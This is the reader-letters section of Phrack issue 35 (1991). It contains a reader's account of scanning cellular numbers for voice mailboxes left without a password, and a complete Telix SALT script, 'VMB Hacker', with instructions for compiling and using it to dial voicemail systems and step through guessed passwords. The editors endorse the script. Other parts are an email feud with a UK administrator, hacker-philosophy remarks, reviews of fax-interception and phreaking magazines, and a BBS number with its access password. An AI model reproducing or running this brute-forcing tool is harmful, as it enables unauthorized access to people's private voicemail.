| ==Phrack Inc.== | |
| Volume Three, Issue Thirty-five, File 2 of 13 | |
| [-=:< Phrack Loopback >:=-] | |
| By Phrack Staff | |
| Phrack Loopback is a forum for you, the reader, to ask questions, air | |
| problems, and talk about what ever topic you would like to discuss. This is | |
| also the place The Phrack Staff will make suggestions to you by reviewing | |
| various items of note; magazines, software, catalogs, hardware, etc. | |
| ______________________________________________________________________________ | |
| What's on Your Mind | |
| ~~~~~~~~~~~~~~~~~~ | |
| :: Hacking VMB's :: | |
| From: Mr. Upsetter | |
| To: phracksub@stormking.com | |
| Subject: Phrack 34 VMB article | |
| The article in Phrack 34 on voice mail hacking by Night Ranger was really good. | |
| It reminded me of some experiences I had with a cellular voice mail system a | |
| couple years ago in San Diego. I would bet there are similar systems in other | |
| cities. | |
| These VMB's would automatically answer calls when the subscriber wasn't on the | |
| air. They worked just like standard VMB's. To access the box, the owner could | |
| dial his or her own cellular number, then hit * when it answered. Then the VMB | |
| would ask for a password. | |
| Guess what the default password was? None! That meant all you had to do was | |
| dial up a cellular VMB and hit *, and you were in. How many VMB's still had | |
| the default password? About half... | |
| To scan for cellular VMB's all you had to do was dial numbers in the cellular | |
| prefix. It was pretty fun...almost too easy. | |
| Cheers, | |
| Mr. Upsetter | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| >From: Zoso Puda | |
| > | |
| >After reading PHRACK 34 I thought it was good. Especially the article on VMB | |
| >hacking. As a matter of fact I wrote a SALT script to help me do it. | |
| This is exactly what we like to see. People actually getting basic | |
| information and building on it. | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| +-------------------------------------+ | |
| | ZoSoft Telix VMB Hacker | | |
| | | | |
| | written by: Zoso Puda | | |
| +-------------------------------------+ | |
| First words | |
| ----------- | |
| After reading Night Ranger's article (see PHRACK 34), I decided to make a | |
| VMB hacking program. Night Ranger provided good insight into how to hack VMB | |
| systems but some VMBs are hard to crack. What I came up with is a program to | |
| help me hack some of the harder systems. The ones that don't use the defaults | |
| are tough. Also my phone has the buttons and earpiece in one unit and I had to | |
| dial then put the phone to my ear and listen, look at the buttons to dial a | |
| number and put the phone back to my ear to listen. It soon became tiresome. | |
| What I finally came up with was a program to let me run all the phone | |
| functions from the keyboard. My modem speaker is loud enough to hear clearly so | |
| it seemed like the perfect thing to do. I also automated certain features like | |
| incrementing the password or box number. The program is not fully automated | |
| however. You must run this program manually. It's main purpose is to allow you | |
| to run normal phone functions via the keyboard. If you cannot hear clearly | |
| through your modem speaker then pick up the phone after the program dials the | |
| VMB phone # and hang up the phone before hanging up the modem. | |
| What follows is a brief description on how to use the program, compile the | |
| program, and run the program. A working knowledge of VMB systems is expected. | |
| Parameter details | |
| ----------------- | |
| VMB phone number : If you don't know this, give it up. | |
| Setup sequence : This code is used for systems that require a '9' or '#' or | |
| '*' to be pressed before the box number. Up to 3 characters | |
| can be in this string. | |
| Valid Box # : This would be a known valid box or the box you will | |
| be attempting to hack. This value remains constant. | |
| Codefile filename: You may use a file to get 'default' or your favorite | |
| passwords from. You must include the extension. | |
| Starting box/code: Box # or code to start checking. This value will | |
| increase automatically upon pressing [F7]. | |
| Using the function keys | |
| ----------------------- | |
| [F1] Dials the VMB system (see params). | |
| [F2] Hangs-up the modem. | |
| [F3] Closes the current codefile.(see params). | |
| [F4] Lets you set the current code/box #. | |
| [F5] Dials the Setup sequence (see params). | |
| [F6] Dials the current code. | |
| [F7] Makes the next code current. | |
| [F8] Dials the valid box (see params). | |
| [F9] Allows you to re-set the parameters. | |
| [F10] Hangs-up and quits the program. | |
| [0 - 9] These keys will dial 0 - 9 respectively. | |
| [*, #] These keys will dial * and #. | |
| [/] Used as a substitute # for the keypad. | |
| Basic Insructions | |
| ----------------- | |
| Codefiles should be stored in the same directory as your Telix program. | |
| A sample codefile should look like this: | |
| 1111 | |
| 2222 | |
| 3333 | |
| etc... | |
| I suggest you make seperate codefiles for the number of digits in each code. | |
| For example, all 3 digit codes should be in a file called 3DIGIT.COD, or | |
| something similar. | |
| During parameter entry, if you enter a codefile and it exists, you will NOT | |
| be prompted for a 'Starting box/code'. When the codefile is finished, the | |
| current code will set itself to 1000. | |
| If you enter a blank for the codefile or the name you entered doesn't exist | |
| then you will be prompted for a 'Starting Box/Code'. | |
| Compiling | |
| --------- | |
| Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file | |
| VMBHACK.SLT into the directory where your Telix scripts are. Compile using | |
| CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press | |
| Alt-G followed by the program name (VMBHACK). | |
| //---------------------------<CUT HERE>------------------------------------- | |
| // ZoSoft VMB Hacker Version 1.4 | |
| // Code by: Zoso, November 1991 | |
| // | |
| // See PHRACK 34 for more information on VMB systems. | |
| // | |
| // NOTE: Do not remove the credits of the original author, modified versions | |
| // you may add credits, but please do not remove any. | |
| // | |
| str code[10], // Global Variables | |
| codes[10], | |
| reset[1], | |
| vmb_number[15], | |
| borc[1], | |
| valid[10], | |
| setup[3]; | |
| str filename[12], | |
| fstatus[10]; | |
| int f; | |
| int fflag = 0; | |
| init_modem() // Modem initialization | |
| { | |
| cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on | |
| cputs("^M"); // some modems, you may have to | |
| waitfor("OK",20); // alter this. See you modem | |
| manual. | |
| } | |
| vmb_dial(str string) // Dial function | |
| { | |
| str workstr[20]; | |
| workstr = string; | |
| strcat(workstr,";"); | |
| cputs("ATDT"); | |
| cputs(workstr); | |
| cputs("^M"); | |
| cputs("^M"); | |
| } | |
| hang_up() // Hang Up function | |
| { | |
| hangup(); | |
| waitfor("",20); | |
| cputs("ATH0"); | |
| cputs("^M"); | |
| cputs("^M"); | |
| clear_scr(); | |
| display(); | |
| } | |
| next_code() // Next code function | |
| { | |
| int cd; | |
| if (fflag) | |
| { | |
| if (not feof(f)) // Check for file first | |
| { | |
| fgets(code,10,f); | |
| return; | |
| } | |
| if (feof(f)) | |
| { | |
| file_close(); | |
| code = "999"; | |
| goto NEXTCODE; | |
| } | |
| } | |
| NEXTCODE: | |
| cd = stoi(code); | |
| cd = cd + 1; // This line determines how the | |
| code | |
| itos(cd,code); // gets incremented. | |
| } | |
| set_code() // Enter new code | |
| { | |
| gotoxy(65,2); | |
| gets(code,10); | |
| } | |
| parameters() // Set parameters | |
| { | |
| str c[1]; | |
| file_close(); | |
| GETINFO: | |
| clear_scr(); | |
| printsc("VMB Hacker Parameters^M^J"); | |
| printsc("^M^JVMB phone number :"); | |
| gets(vmb_number,15); | |
| printsc("^M^JSetup sequence :"); | |
| gets(setup,3); | |
| printsc("^M^JValid box # :"); | |
| gets(valid,10); | |
| printsc("^M^JCodefile filename :"); | |
| gets(filename,12); | |
| if (filename != "") | |
| { | |
| open_file(); | |
| next_code(); | |
| } | |
| if (not fflag) | |
| { | |
| filename = "N/A"; | |
| printsc("^M^JStarting box/code :"); | |
| gets(code,10); | |
| } | |
| printsc("^M^J^M^JCorrect? (Y/n):"); | |
| gets(c,1); | |
| if (c == "n" || c == "N") | |
| goto GETINFO; | |
| } | |
| press_enter() // Pause routine | |
| { | |
| str a[1]; | |
| pstraxy("Press [ENTER] to continue...",20,23,11); | |
| gets(a,1); | |
| } | |
| title_scr() // Title screen | |
| { | |
| str i[1]; | |
| TITLE: | |
| clear_scr(); | |
| pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11); | |
| pstraxy("written for Telix by: Zoso Puda",20,6,14); | |
| press_enter(); | |
| } | |
| display() // Display screen | |
| { | |
| box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19); | |
| pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31); | |
| pstraxy("VMB Number:",4,2,31); // Information display | |
| pstraxy(vmb_number,16,2,27); | |
| pstraxy("Valid #:",33,2,31); | |
| pstraxy(valid,42,2,27); | |
| pstraxy("Current:",57,2,31); | |
| pstraxy(code,66,2,27); | |
| pstraxy("Codefile:",6,4,31); | |
| pstraxy(filename,16,4,27); | |
| pstraxy("File status:",29,4,31); | |
| pstraxy(fstatus,42,4,27); | |
| pstraxy("Setup sequence:",50,4,31); | |
| pstraxy(setup,66,4,27); | |
| box(0,6,78,10,4,0,103); // Function key display | |
| pstraxy("[ ]",30,6,111); | |
| pstraxy(" 0 - 9,*,#",31,6,110); | |
| pstraxy("[ ] Dial VMB", 2,7,111); | |
| pstraxy("F1", 3,7,110); | |
| pstraxy("[ ] Hang up",22,7,111); | |
| pstraxy("F2",23,7,110); | |
| pstraxy("[ ] Close file",42,7,111); | |
| pstraxy("F3",43,7,110); | |
| pstraxy("[ ] Set Current",61,7,111); | |
| pstraxy("F4",62,7,110); | |
| pstraxy("[ ] Setup seq.",2,8,111); | |
| pstraxy("F5", 3,8,110); | |
| pstraxy("[ ] Dial current",22,8,111); | |
| pstraxy("F6",23,8,110); | |
| pstraxy("[ ] Next box/code",42,8,111); | |
| pstraxy("F7",43,8,110); | |
| pstraxy("[ ] Valid box",61,8,111); | |
| pstraxy("F8",62,8,110); | |
| pstraxy("[ ] Parameters",22,9,111); | |
| pstraxy("F9",23,9,110); | |
| pstraxy("[ ] QUIT",41,9,111); | |
| pstraxy("F10",42,9,110); | |
| gotoxy(0,11); | |
| } | |
| quit_vmb() // End program | |
| { | |
| file_close(); | |
| hangup(); | |
| waitfor("",20); | |
| clear_scr(); | |
| printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J"); | |
| cputs_tr(_mdm_init_str); // Restore modem params | |
| } | |
| open_file() // Open Codefile | |
| { | |
| fflag = 1; | |
| f = fopen(filename,"r"); | |
| fstatus = "OPEN"; | |
| if (ferror(f)) | |
| file_close(); | |
| } | |
| file_close() // Close Codefile | |
| { | |
| fflag = 0; | |
| fclose(f); | |
| fstatus = "CLOSED"; | |
| } | |
| main() // MAIN program module | |
| { | |
| int chr; | |
| title_scr(); | |
| parameters(); | |
| clear_scr(); | |
| display(); | |
| init_modem(); | |
| TOP: | |
| gotoxy(0,11); | |
| chr = inkeyw(); | |
| if (chr == '0') vmb_dial("0"); // Dial 0-9 | |
| if (chr == '1') vmb_dial("1"); | |
| if (chr == '2') vmb_dial("2"); | |
| if (chr == '3') vmb_dial("3"); | |
| if (chr == '4') vmb_dial("4"); | |
| if (chr == '5') vmb_dial("5"); | |
| if (chr == '6') vmb_dial("6"); | |
| if (chr == '7') vmb_dial("7"); | |
| if (chr == '8') vmb_dial("8"); | |
| if (chr == '9') vmb_dial("9"); | |
| if (chr == '#') vmb_dial("#"); // Pound sign (#) | |
| if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad | |
| if (chr == '*') vmb_dial("*"); // Asterisk (*) | |
| if (chr == 15104) // F1 | |
| vmb_dial(vmb_number); | |
| if (chr == 15360) // F2 | |
| hang_up(); | |
| if (chr == 15616) // F3 | |
| { | |
| file_close(); | |
| display(); | |
| } | |
| if (chr == 15872) // F4 | |
| { | |
| set_code(); | |
| display(); | |
| } | |
| if (chr == 16128) // F5 | |
| vmb_dial(setup); | |
| if (chr == 16384) // F6 | |
| vmb_dial(code); | |
| if (chr == 16640) // F7 | |
| { | |
| next_code(); | |
| display(); | |
| } | |
| if (chr == 16896) // F8 | |
| vmb_dial(valid); | |
| if (chr == 17152) // F9 | |
| { | |
| hang_up(); | |
| parameters(); | |
| display(); | |
| } | |
| if (chr == 17408) // F10 | |
| { | |
| quit_vmb(); | |
| goto END; | |
| } | |
| goto TOP; | |
| END: | |
| prints("^M^J"); | |
| } | |
| //---------------------------<CUT HERE>--------------------- | |
| ______________________________________________________________________________ | |
| :: More Legal Stuff :: | |
| >From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk> | |
| >Subject: RE: Who/What is this? | |
| > | |
| >In this country, the receipt of documents like this would probably be | |
| >pretty helpful in sending a person down on a conspiracy to contravene | |
| >a section or more of the Computer Misuse Act, I do not appreciate crap | |
| >like this appearing on my machine but since you didn't send it me, I | |
| >can't really moan at you - What I would appreciate though is if you | |
| >told people that forwarding it to people who don't want it is probably | |
| >not a good idea, unless you want all your list members locked up in | |
| >some pokey British gaol that is! | |
| > | |
| >Michael Lawrie. | |
| >--- | |
| >Michael Lawrie, Hicom Group Security <security@uk.ac.lut.hicom> | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Sir, | |
| You will have to excuse my ignorance of telecom laws in other countries. | |
| In the United States, distribution of technical information such as Phrack Inc. | |
| is protected by law. | |
| Hackers are not involved in conspiracies or plots. Most hackers could | |
| care less about politics. Hackers are interested in the progression of | |
| technology and learning about how our advanced society works. The inefficient | |
| structure known as government is the last thing most hackers are interested in | |
| exploring. | |
| Phrack Inc. has no "membership." Phrack Inc. is an electronically | |
| distributed publication. It is like any other security oriented newsletter. | |
| Have you ever heard of "Computer Security Journal", "Computers and Security", | |
| or "Computer Crime Digest?" These are some of the "security industry" | |
| publications that are read in the U.S. Phrack Inc. merely has a little | |
| different flavor to it. If you are interested in seeing any of these printed | |
| journals, I can forward their address to you. | |
| I am sorry if you received Phrack Inc. and didn't wish to read it. You | |
| might wish to take the matter up with the person that forwarded it to you. I | |
| hope it wasn't too big of an inconvenience for you to delete the mail message | |
| containing Phrack Inc. | |
| Cheers, | |
| Dispater | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| After a (as it turns out not so private) conversation with Torq, it seems | |
| this guy isn't even an admin anywhere. He just likes to pretend he is. Did my | |
| reply end this little debate? NOT! This person had the nerve to intercept my | |
| private mail to Torq and then proceeded to bitch about it some more. | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| >From MICHAEL@hicom.loughborough.ac.uk Sat Nov 9 09:45:53 1991 | |
| Date: Fri, 8 Nov 91 13:19 GMT | |
| From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk> | |
| To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>> | |
| Subject: The EFF. | |
| I found the following message the other day, whilst routing around, I am to | |
| assume you lied to me about taking him off the list but for now we'll forget | |
| that. | |
| > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991 | |
| > Date: Wed, 23 Oct 91 01:41:47 -0400 | |
| > From: phracksub@stormking.com | |
| > Message-Id: <::::::::::::::::::::::> | |
| > To: torq@::::::::::::::: | |
| > Subject: Phrack | |
| > | |
| > This guy sounds like a total idiot. If he does kill your account or something | |
| > stupid, get a hold of the EFF. They went to bat for someone who had their | |
| > account revoked because he/she had issues of Phrack on their directory. | |
| > | |
| > people should get a clue.... | |
| > | |
| > Dispater | |
| > phracksub@stormking.com | |
| As you say, people should get a clue. Are you assuming that 'torq' is perhaps | |
| American and as such has his rights protected by constitution? He isn't, he is | |
| British and doesn't really as such have much going for him. If I want to kill | |
| his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack' | |
| is not breaking any laws because it does not show intent, it would be breaking | |
| my machine's regulations if it came here. I would enjoy the EFF to come 'to | |
| bat' for Torq if I revoke his account for having issues of Phrack in his | |
| directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK | |
| that you know of? | |
| Regards... | |
| Michael. | |
| --- | |
| Michael Lawrie, Operations Group, Systems Development and Security. | |
| Mail: michael@uk.ac.lut.hicom (Span:19527::60478::lorry) | |
| [What pretentious signature?] (Inet: lorry@mit.edu) | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| From: Dispater | |
| To: MICHAEL@hicom.loughborough.ac.uk | |
| I never said I would delete him from the distribution list. I don't | |
| have to DO anything. Who the hell are you pretending to be anyway? You aren't | |
| the admin of MIT's gnu machine. | |
| >I found the following message the other day, whilst routing around, I am to | |
| >assume you lied to me about taking him off the list but for now we'll forget | |
| >that. | |
| Really? What the hell were you doing prowling though someone else's | |
| mail? I assume you did it without Torq's permission. I wonder if MIT would | |
| like to hear that some British hacker is rummaging around their machine? Your | |
| "finding" of our private e-mail might place you in criminal violation of the | |
| Electronic Communications Privacy Act of 1986. This is a federal law in the | |
| United States which protects the privacy of electronic communications. Your | |
| interception of our communications has violated our privacy. How would you | |
| like me to have a little chat with YOUR supervisor? | |
| Why you care about what takes place on the MIT computer which is located | |
| here in the USA? In this country freedom of speech is a right granted to all | |
| its citizens. The previous publisher of Phrack had to go to Federal Court to | |
| prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one | |
| damn thing you can do about it! | |
| Dispater | |
| ______________________________________________________________________________ | |
| :: Hacker Philosophy :: | |
| From: The Dark Lord Sarik Malthus | |
| Organization: Underground Computing Foundation | |
| > I'm curious...now, don't think I am trying to judge you, or your | |
| > actions, or anything...but I am wondering how you, in your mind, justify the | |
| > actions of hackers and the kind of information provided by your magazine? | |
| I don't. I think people spend too much time attempting to justify | |
| their "morality." I don't play that guilt trip. I only seek information. | |
| Information has no morality. It is simple and pure, just like truth. | |
| I do feel that with knowledge comes responsibility not to use it in a | |
| destructive way. This is why I will not print "how to make bomb" files in | |
| Phrack Inc. Explosives are made for one thing and it doesn't involve too | |
| much creativity. People can get that type of stuff elsewhere. | |
| I have never damaged any system or hurt any individual financially. | |
| Carding is unquestionable robbery. If you know the person you are carding | |
| from, that is revenge and is a different category, as far as I am concerned, | |
| but it still doesn't make it right. Besides, any poser with half a brain can | |
| pull a CBI. That doesn't demonstrate much talent to me. I admit I went | |
| through the c0deZ phase, but I moved onto better things. | |
| I guess your basic question may boil down to, "Why hack?" I see the | |
| internet and the telecom world in as the latest frontier to be explored. If | |
| you look back at how this country started, you will see that it was explored | |
| by people who probably had a similar mentality to that of hackers. We want | |
| to test ourselves. We want to have a broad range of different experiences in | |
| our lives. We are not content with ignorance of the unknown. And, to some | |
| extent we are sick of our current society's norms. With that in mind we | |
| leave the security of what is considered acceptable at times. | |
| I guess I have a lot of different unpopular views....oh well. | |
| _______________________________________________________________________________ | |
| A Review of: | |
| ~~~~~~~~~~ | |
| Full Disclosure #23 - a publication For Truth, Justice, and The American Way | |
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
| Full Disclosure Subscription Rates: | |
| P.O. Box 903-FD23 U.S - 12 issues for $18.00 | |
| Libertyville IL 60048 24 issues for $29.95 | |
| No Canadian orders, please! | |
| by:Twisted Pair | |
| About a month ago I mailed in a coupon I got from friend in order to get a | |
| sample issue of Full Disclosure. Within a week I received Issue #23. It's got | |
| articles on fax interception, dumpster diving, computer security tips, | |
| surveillance tips, technical stuff, mail surveillance, etc. | |
| The Fax Interception article was most interesting to me. I've often | |
| wondered just how easy it could be to intercept faxes. Its all explained in | |
| the article. Here's some text from the article: | |
| | False Sense of Security: | |
| | | |
| | With the widespread proliferation of fax machines came increased use. | |
| | In general, a document transferred has been given the same sort of | |
| | validity as one sent or received by the U.S. Mail.* In general, such | |
| | communications were originally secure. Now that interception equipment is | |
| | available, the | |
| | sense of security has become false. | |
| *Note: Just this month, the FCC has stopped accepting paperwork with faxed | |
| signatures on them. Their new policy states that they only accept | |
| original signatures. | |
| How could the average Phrack reader start intercepting faxes? Use a | |
| standard fax machine hooked up to someone's line? Naaah. Wouldn't work. The | |
| handshaking routine between the two corresponding fax machines would be screwed | |
| all to hell if you threw a third machine into the mix. Full Disclosure claims | |
| to have successfully nabbed faxes with another method. They've pointed out | |
| this assertion with a photo on their front page of a "fax". It was supposedly | |
| intercepted from the FBI. It shows a computer screen with an FBI "FAX" on it. | |
| It looks more like the photo was made with some cutting and pasting at the | |
| neighborhood PIP store. Maybe they should have added the caption "Simulated | |
| Picture" to their front page. | |
| They recommend using IBM PC fax boards to intercept faxes. You'd need | |
| "sophisticated" software that would ignore the handshaking sequences between | |
| the two fax machines you're spying on. The IBM would just save all the page | |
| information and ignore the protocol information transmitted. | |
| Back to the article.... | |
| | Cellular phone-based fax machines provide ripe opportunity for "hacker" | |
| | intercepts, since the signal is available via low cost police scanners.* | |
| | No physical connection to a common carrier network is necessary. There is | |
| | absolutely no risk of being detected. | |
| *Note: That should read MODIFIED police scanners. See any of the ads in | |
| "Nuts & Volts" for a book on doing this. | |
| Discussed in the article is something called Broadband Interception. | |
| Commercial fax interception equipment can be hooked up to monitor satellite | |
| link traffic. One unit can decode up to 150 simultaneous fax transmissions | |
| from a 6,000 phone line satellite link. | |
| Next, all the consequences of forged faxes are discussed. People have | |
| become so reliant on fax technology that they incorrectly assume that anything | |
| that "comes over the fax" must be legitimate. Forgers find faxing much simpler | |
| than trying to make a "real" document. The trouble of altering postmarks and | |
| signatures is bypassed. All they need now is scissors and tape to make any | |
| "legitimate-looking" document needed. In their next issue, they further | |
| discuss fax interception and all the implications of sending sensitive info by | |
| fax. | |
| | Fax Intercept Suppliers | |
| | (The sale and/or use of fax interception equipment may be | |
| | restricted by State and Federal law) | |
| | | |
| | Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444; | |
| | Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316; | |
| | El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673; | |
| | [Many others listed] | |
| Oh, here's an ad from Full Disclosure. It's a business card run: | |
| ______________________________________________________ | |
| | | | | |
| | | Unix Systems Specialists Available July 10, 1992 | | |
| | | | | |
| | | L E N R O S E | | |
| | | | | |
| | | Convicted "Hacker" | | |
| | | and | | |
| | | Computer Consultant | | |
| | | 799 Royal St. Geore #105 | | |
| | | Naperville, IL 60563 (708) 527-1293 | | |
| | |______________________________________________________| | |
| Since you might want to check out a copy of Full Disclosure for yourself, | |
| I'll include their address and stuff. The issue I had was 16 pages long, | |
| half-newspaper size. | |
| ______________________________________________________________________________ | |
| A Review of TAP #105 | |
| ~~~~~~~~~~~~~~~~~~~ | |
| TAP Magazine Subscription Rates: | |
| PO Box 20264 10 issues for $10.00 | |
| Louisville KY 40250-0264 | |
| by Dispater | |
| Around March of 1991 I mailed in my $10. for a subscription to TAP | |
| Magazine. Promoted as "the oldest hacker magazine" and "created by Abbie | |
| Hoffman." I still, to this day, have not received ONE issue for my money. | |
| While attending CyberView '91, I met Predat0r and gave him $5.00 for a few | |
| back issues consisting of #97, #100 through issue #104. I was later given a | |
| complimentary issue of #105. After asking about #98 & #99, Predat0r said that | |
| he wasn't going to give those out because of some bullshit with Aristotle. | |
| Whatever...I still don't see why we couldn't see it. | |
| Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular, | |
| but it wasn't bad either. The issue was 18 pages long. For those of you who | |
| have never seen it, TAP contains information on hacking and phreaking as well | |
| as some political commentary. The articles are always diverse and interesting. | |
| TAP #105 contained information about the DNA Box. This is basically | |
| cellular phone phreaking. It was very good and quite detailed. There were | |
| also schematics of bugs and a flow chart explaining the incident initiation | |
| sequence of the E-911 system. This issue of TAP was sprinkled with some neat | |
| advertisements and news clippings (as usual) and wrapped up with a file about | |
| Blue Boxing. The price of $10.00 for 10 issues is worth it, but read on... | |
| Last week I asked Predat0r what was going on with TAP magazine. He told | |
| me that he had the material for the next three issues, but his copier or some | |
| other equipment was broken. This is an excuse I have heard before. Whether it | |
| is a valid excuse or not, only he knows. Since issue #105 (June) there has | |
| been not one issue of TAP. If you have ordered a subscription prior to July | |
| and not received anything, I highly suggest you write to Predat0r. | |
| The material contained in TAP is good and very much worth the price. | |
| (Especially compared to 2600 Magazine) However, I find that the general | |
| management of TAP to be poor, at this time, and therefore I highly recommend | |
| that you NOT send your $10 to TAP Magazine. Considering the amount of | |
| advertisements that we have all seen by TAP (in magazines such as Mondo 2000, | |
| 2600, etc.) in the past year, there is no excuse for the non-existent service | |
| that has transpired. Predat0r is a good sysop and needs to manage TAP as he | |
| does his BBS. I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP: | |
| COLUMBIAN COKE. | |
| I really don't like to be so critical, but I know some people I've talked | |
| to are feeling ripped off. This is why I wrote this. I truly hope that TAP | |
| can get out of this slump. | |
| _______________________________________________________________________________ | |